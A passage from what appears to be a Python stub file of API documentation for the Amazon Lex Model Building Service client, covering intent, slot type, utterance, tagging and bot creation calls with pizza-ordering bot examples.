An array of IntentMetadata objects, one for each numbered version of the intent plus one for the $LATEST version.
(dict) --
Provides information about an intent.
name (string) --
The name of the intent.
description (string) --
A description of the intent.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create an intent, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent.
nextToken (string) --
A pagination token for fetching the next page of intent versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_intents(nextToken=None, maxResults=None, nameContains=None):
"""
Returns intent information as follows:
The operation requires permission for the lex:GetIntents action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get a list of all of the intents in your account.
Expected Output:
:example: response = client.get_intents(
nextToken='string',
maxResults=123,
nameContains='string'
)
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of intents. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of intents to return in the response. The default is 10.
:type nameContains: string
:param nameContains: Substring to match in intent names. An intent will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
ReturnsResponse Syntax
{
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
intents (list) --
An array of Intent objects. For more information, see PutBot .
(dict) --
Provides information about an intent.
name (string) --
The name of the intent.
description (string) --
A description of the intent.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create an intent, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent.
nextToken (string) --
If the response is truncated, the response includes a pagination token that you can specify in your next request to fetch the next page of intents.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get a list of all of the intents in your account.
response = client.get_intents(
maxResults=10,
nextToken='',
)
print(response)
Expected Output:
{
'intents': [
{
'version': '$LATEST',
'name': 'DocOrderPizza',
'createdDate': 1494359783.453,
'description': 'Order a pizza from a local pizzeria.',
'lastUpdatedDate': 1494359783.453,
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'intents': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
nextToken (string) -- A pagination token that fetches the next page of intents. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, specify the pagination token in the next request.
maxResults (integer) -- The maximum number of intents to return in the response. The default is 10.
nameContains (string) -- Substring to match in intent names. An intent will be returned if any part of its name matches the substring. For example, "xyz" matches both "xyzabc" and "abcxyz."
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_slot_type(name=None, version=None):
"""
Returns information about a specific version of a slot type. In addition to specifying the slot type name, you must specify the slot type version.
This operation requires permissions for the lex:GetSlotType action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get information about a slot type.
Expected Output:
:example: response = client.get_slot_type(
name='string',
version='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type. The name is case sensitive.\n
:type version: string
:param version: [REQUIRED]\nThe version of the slot type.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
Response Structure
(dict) --
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
enumerationValues (list) --
A list of EnumerationValue objects that defines the values that the slot type can take.
(dict) --
Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.
For example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values
thick
thin
stuffed
value (string) --
The value of the slot type.
synonyms (list) --
Additional values related to the slot type value.
(string) --
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last update date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type.
checksum (string) --
Checksum of the $LATEST version of the slot type.
valueSelectionStrategy (string) --
The strategy that Amazon Lex uses to determine the value of the slot. For more information, see PutSlotType .
parentSlotTypeSignature (string) --
The built-in slot type used as a parent for the slot type.
slotTypeConfigurations (list) --
Configuration information that extends the parent built-in slot type.
(dict) --
Provides configuration information for a slot type.
regexConfiguration (dict) --
A regular expression used to validate the value of a slot.
pattern (string) --
A regular expression used to validate the value of a slot.
Use a standard regular expression. Amazon Lex supports the following characters in the regular expression:
A-Z, a-z
0-9
Unicode characters ("u<Unicode>")
Represent Unicode characters with four digits, for example "u0041" or "u005A".
The following regular expression operators are not supported:
Infinite repeaters: *, +, or {x,} with no upper bound.
Wild card (.)
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get information about a slot type.
response = client.get_slot_type(
version='$LATEST',
name='DocPizzaCrustType',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocPizzaCrustType',
'checksum': '210b3d5a-90a3-4b22-ac7e-f50c2c71095f',
'createdDate': 1494359274.403,
'description': 'Available crust types',
'enumerationValues': [
{
'value': 'thick',
},
{
'value': 'thin',
},
],
'lastUpdatedDate': 1494359274.403,
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
:returns:
thick
thin
stuffed
"""
pass
def get_slot_type_versions(name=None, nextToken=None, maxResults=None):
"""
Gets information about all versions of a slot type.
The GetSlotTypeVersions operation returns a SlotTypeMetadata object for each version of a slot type. For example, if a slot type has three numbered versions, the GetSlotTypeVersions operation returns four SlotTypeMetadata objects in the response, one for each numbered version and one for the $LATEST version.
The GetSlotTypeVersions operation always returns at least one version, the $LATEST version.
This operation requires permissions for the lex:GetSlotTypeVersions action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_slot_type_versions(
name='string',
nextToken='string',
maxResults=123
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type for which versions should be returned.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of slot type versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of slot type versions to return in the response. The default is 10.
:rtype: dict
ReturnsResponse Syntax
{
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
slotTypes (list) --
An array of SlotTypeMetadata objects, one for each numbered version of the slot type plus one for the $LATEST version.
(dict) --
Provides information about a slot type..
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type.
nextToken (string) --
A pagination token for fetching the next page of slot type versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_slot_types(nextToken=None, maxResults=None, nameContains=None):
"""
Returns slot type information as follows:
The operation requires permission for the lex:GetSlotTypes action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get a list of all of the slot types in your account.
Expected Output:
:example: response = client.get_slot_types(
nextToken='string',
maxResults=123,
nameContains='string'
)
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of slot types. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch next page of slot types, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of slot types to return in the response. The default is 10.
:type nameContains: string
:param nameContains: Substring to match in slot type names. A slot type will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
ReturnsResponse Syntax
{
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
slotTypes (list) --
An array of objects, one for each slot type, that provides information such as the name of the slot type, the version, and a description.
(dict) --
Provides information about a slot type..
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type.
nextToken (string) --
If the response is truncated, it includes a pagination token that you can specify in your next request to fetch the next page of slot types.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get a list of all of the slot types in your account.
response = client.get_slot_types(
maxResults=10,
nextToken='',
)
print(response)
Expected Output:
{
'slotTypes': [
{
'version': '$LATEST',
'name': 'DocPizzaCrustType',
'createdDate': 1494359274.403,
'description': 'Available crust types',
'lastUpdatedDate': 1494359274.403,
},
{
'version': '$LATEST',
'name': 'DocPizzaSauceType',
'createdDate': 1494356442.23,
'description': 'Available pizza sauces',
'lastUpdatedDate': 1494356442.23,
},
{
'version': '$LATEST',
'name': 'DocPizzaType',
'createdDate': 1494359198.656,
'description': 'Available pizzas',
'lastUpdatedDate': 1494359198.656,
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'slotTypes': [
{
'name': 'string',
'description': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
nextToken (string) -- A pagination token that fetches the next page of slot types. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch next page of slot types, specify the pagination token in the next request.
maxResults (integer) -- The maximum number of slot types to return in the response. The default is 10.
nameContains (string) -- Substring to match in slot type names. A slot type will be returned if any part of its name matches the substring. For example, "xyz" matches both "xyzabc" and "abcxyz."
"""
pass
def get_utterances_view(botName=None, botVersions=None, statusType=None):
"""
Use the GetUtterancesView operation to get information about the utterances that your users have made to your bot. You can use this list to tune the utterances that your bot responds to.
For example, say that you have created a bot to order flowers. After your users have used your bot for a while, use the GetUtterancesView operation to see the requests that they have made and whether they have been successful. You might find that the utterance "I want flowers" is not being recognized. You could add this utterance to the OrderFlowers intent so that your bot recognizes that utterance.
After you publish a new version of a bot, you can get information about the old version and the new so that you can compare the performance across the two versions.
Utterance statistics are generated once a day. Data is available for the last 15 days. You can request information for up to 5 versions of your bot in each request. Amazon Lex returns the most frequent utterances received by the bot in the last 15 days. The response contains information about a maximum of 100 utterances for each version.
If you set childDirected field to true when you created your bot, or if you opted out of participating in improving Amazon Lex, utterances are not available.
This operation requires permissions for the lex:GetUtterancesView action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_utterances_view(
botName='string',
botVersions=[
'string',
],
statusType='Detected'|'Missed'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot for which utterance information should be returned.\n
:type botVersions: list
:param botVersions: [REQUIRED]\nAn array of bot versions for which utterance information should be returned. The limit is 5 versions per request.\n\n(string) --\n\n
:type statusType: string
:param statusType: [REQUIRED]\nTo return utterances that were recognized and handled, use Detected . To return utterances that were not recognized, use Missed .\n
:rtype: dict
ReturnsResponse Syntax
{
'botName': 'string',
'utterances': [
{
'botVersion': 'string',
'utterances': [
{
'utteranceString': 'string',
'count': 123,
'distinctUsers': 123,
'firstUtteredDate': datetime(2015, 1, 1),
'lastUtteredDate': datetime(2015, 1, 1)
},
]
},
]
}
Response Structure
(dict) --
botName (string) --
The name of the bot for which utterance information was returned.
utterances (list) --
An array of UtteranceList objects, each containing a list of UtteranceData objects describing the utterances that were processed by your bot. The response contains a maximum of 100 UtteranceData objects for each version. Amazon Lex returns the most frequent utterances received by the bot in the last 15 days.
(dict) --
Provides a list of utterances that have been made to a specific version of your bot. The list contains a maximum of 100 utterances.
botVersion (string) --
The version of the bot that processed the list.
utterances (list) --
One or more UtteranceData objects that contain information about the utterances that have been made to a bot. The maximum number of object is 100.
(dict) --
Provides information about a single utterance that was made to your bot.
utteranceString (string) --
The text that was entered by the user or the text representation of an audio clip.
count (integer) --
The number of times that the utterance was processed.
distinctUsers (integer) --
The total number of individuals that used the utterance.
firstUtteredDate (datetime) --
The date that the utterance was first recorded.
lastUtteredDate (datetime) --
The date that the utterance was last recorded.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'botName': 'string',
'utterances': [
{
'botVersion': 'string',
'utterances': [
{
'utteranceString': 'string',
'count': 123,
'distinctUsers': 123,
'firstUtteredDate': datetime(2015, 1, 1),
'lastUtteredDate': datetime(2015, 1, 1)
},
]
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def list_tags_for_resource(resourceArn=None):
"""
Gets a list of tags associated with the specified resource. Only bots, bot aliases, and bot channels can have tags associated with them.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
resourceArn='string'
)
:type resourceArn: string
:param resourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to get a list of tags for.\n
:rtype: dict
ReturnsResponse Syntax{
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
Response Structure
(dict) --
tags (list) --The tags associated with a resource.
(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --The value associated with a key. The value may be an empty string but it can\'t be null.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.LimitExceededException
:return: {
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
"""
pass
def put_bot(name=None, description=None, intents=None, clarificationPrompt=None, abortStatement=None, idleSessionTTLInSeconds=None, voiceId=None, checksum=None, processBehavior=None, locale=None, childDirected=None, detectSentiment=None, createVersion=None, tags=None):
"""
Creates an Amazon Lex conversational bot or replaces an existing bot. When you create or update a bot you are only required to specify a name, a locale, and whether the bot is directed toward children under age 13. You can use this to add intents later, or to remove intents from an existing bot. When you create a bot with the minimum information, the bot is created or updated but Amazon Lex returns the response FAILED . You can build the bot after you add one or more intents. For more information about Amazon Lex bots, see how-it-works .
If you specify the name of an existing bot, the fields in the request replace the existing values in the $LATEST version of the bot. Amazon Lex removes any fields that you don\'t provide values for in the request, except for the idleTTLInSeconds and privacySettings fields, which are set to their default values. If you don\'t specify values for required fields, Amazon Lex throws an exception.
This operation requires permissions for the lex:PutBot action. For more information, see security-iam .
See also: AWS API Documentation
Exceptions
Examples
This example shows how to create a bot for ordering pizzas.
Expected Output:
:example: response = client.put_bot(
name='string',
description='string',
intents=[
{
'intentName': 'string',
'intentVersion': 'string'
},
],
clarificationPrompt={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
abortStatement={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
idleSessionTTLInSeconds=123,
voiceId='string',
checksum='string',
processBehavior='SAVE'|'BUILD',
locale='en-US'|'en-GB'|'de-DE',
childDirected=True|False,
detectSentiment=True|False,
createVersion=True|False,
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot. The name is not case sensitive.\n
:type description: string
:param description: A description of the bot.
:type intents: list
:param intents: An array of Intent objects. Each intent represents a command that a user can express. For example, a pizza ordering bot might support an OrderPizza intent. For more information, see how-it-works .\n\n(dict) --Identifies the specific version of an intent.\n\nintentName (string) -- [REQUIRED]The name of the intent.\n\nintentVersion (string) -- [REQUIRED]The version of the intent.\n\n\n\n\n
:type clarificationPrompt: dict
:param clarificationPrompt: When Amazon Lex doesn\'t understand the user\'s intent, it uses this message to get clarification. To specify how many times Amazon Lex should repeat the clarification prompt, use the maxAttempts field. If Amazon Lex still doesn\'t understand, it sends the message in the abortStatement field.\nWhen you create a clarification prompt, make sure that it suggests the correct response from the user. for example, for a bot that orders pizza and drinks, you might create this clarification prompt: 'What would you like to do? You can say \'Order a pizza\' or \'Order a drink.\''\nIf you have defined a fallback intent, it will be invoked if the clarification prompt is repeated the number of times defined in the maxAttempts field. For more information, see AMAZON.FallbackIntent .\nIf you don\'t define a clarification prompt, at runtime Amazon Lex will return a 400 Bad Request exception in three cases:\n\nFollow-up prompt - When the user responds to a follow-up prompt but does not provide an intent. For example, in response to a follow-up prompt that says 'Would you like anything else today?' the user says 'Yes.' Amazon Lex will return a 400 Bad Request exception because it does not have a clarification prompt to send to the user to get an intent.\nLambda function - When using a Lambda function, you return an ElicitIntent dialog type. Since Amazon Lex does not have a clarification prompt to get an intent from the user, it returns a 400 Bad Request exception.\nPutSession operation - When using the PutSession operation, you send an ElicitIntent dialog type. Since Amazon Lex does not have a clarification prompt to get an intent from the user, it returns a 400 Bad Request exception.\n\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n
:type abortStatement: dict
:param abortStatement: When Amazon Lex can\'t understand the user\'s input in context, it tries to elicit the information a few times. After that, Amazon Lex sends the message defined in abortStatement to the user, and then aborts the conversation. To set the number of retries, use the valueElicitationPrompt field for the slot type.\nFor example, in a pizza ordering bot, Amazon Lex might ask a user 'What type of crust would you like?' If the user\'s response is not one of the expected responses (for example, 'thin crust, 'deep dish,' etc.), Amazon Lex tries to elicit a correct response a few more times.\nFor example, in a pizza ordering application, OrderPizza might be one of the intents. This intent might require the CrustType slot. You specify the valueElicitationPrompt field when you create the CrustType slot.\nIf you have defined a fallback intent the abort statement will not be sent to the user, the fallback intent is used instead. For more information, see AMAZON.FallbackIntent .\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n
:type idleSessionTTLInSeconds: integer
:param idleSessionTTLInSeconds: The maximum time in seconds that Amazon Lex retains the data gathered in a conversation.\nA user interaction session remains active for the amount of time specified. If no conversation occurs during this time, the session expires and Amazon Lex deletes any data provided before the timeout.\nFor example, suppose that a user chooses the OrderPizza intent, but gets sidetracked halfway through placing an order. If the user doesn\'t complete the order within the specified time, Amazon Lex discards the slot information that it gathered, and the user must start over.\nIf you don\'t include the idleSessionTTLInSeconds element in a PutBot operation request, Amazon Lex uses the default value. This is also true if the request replaces an existing bot.\nThe default is 300 seconds (5 minutes).\n
:type voiceId: string
:param voiceId: The Amazon Polly voice ID that you want Amazon Lex to use for voice interactions with the user. The locale configured for the voice must match the locale of the bot. For more information, see Voices in Amazon Polly in the Amazon Polly Developer Guide .
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new bot, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update a bot, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type processBehavior: string
:param processBehavior: If you set the processBehavior element to BUILD , Amazon Lex builds the bot so that it can be run. If you set the element to SAVE Amazon Lex saves the bot, but doesn\'t build it.\nIf you don\'t specify this value, the default value is BUILD .\n
:type locale: string
:param locale: [REQUIRED]\nSpecifies the target locale for the bot. Any intent used in the bot must be compatible with the locale of the bot.\nThe default is en-US .\n
:type childDirected: boolean
:param childDirected: [REQUIRED]\nFor each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.\nIf your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.\n
:type detectSentiment: boolean
:param detectSentiment: When set to true user utterances are sent to Amazon Comprehend for sentiment analysis. If you don\'t specify detectSentiment , the default is false .
:type createVersion: boolean
:param createVersion: When set to true a new numbered version of the bot is created. This is the same as calling the CreateBotVersion operation. If you don\'t specify createVersion , the default is false .
:type tags: list
:param tags: A list of tags to add to the bot. You can only add tags when you create a bot, you can\'t use the PutBot operation to update the tags on a bot. To update tags, use the TagResource operation.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'createVersion': True|False,
'detectSentiment': True|False,
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
Response Structure
(dict) --
name (string) --
The name of the bot.
description (string) --
A description of the bot.
intents (list) --
An array of Intent objects. For more information, see PutBot .
(dict) --
Identifies the specific version of an intent.
intentName (string) --
The name of the intent.
intentVersion (string) --
The version of the intent.
clarificationPrompt (dict) --
The prompts that Amazon Lex uses when it doesn\'t understand the user\'s intent. For more information, see PutBot .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
abortStatement (dict) --
The message that Amazon Lex uses to abort a conversation. For more information, see PutBot .
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
status (string) --
When you send a request to create a bot with processBehavior set to BUILD , Amazon Lex sets the status response element to BUILDING .
In the READY_BASIC_TESTING state you can test the bot with user inputs that exactly match the utterances configured for the bot\'s intents and values in the slot types.
If Amazon Lex can\'t build the bot, Amazon Lex sets status to FAILED . Amazon Lex returns the reason for the failure in the failureReason response element.
When you set processBehavior to SAVE , Amazon Lex sets the status code to NOT BUILT .
When the bot is in the READY state you can test and publish the bot.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to build the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
idleSessionTTLInSeconds (integer) --
The maximum length of time that Amazon Lex retains the data gathered in a conversation. For more information, see PutBot .
voiceId (string) --
The Amazon Polly voice ID that Amazon Lex uses for voice interaction with the user. For more information, see PutBot .
checksum (string) --
Checksum of the bot that you created.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
locale (string) --
The target locale for the bot.
childDirected (boolean) --
For each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.
If your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.
createVersion (boolean) --
True if a new version of the bot was created. If the createVersion field was not specified in the request, the createVersion field is set to false in the response.
detectSentiment (boolean) --
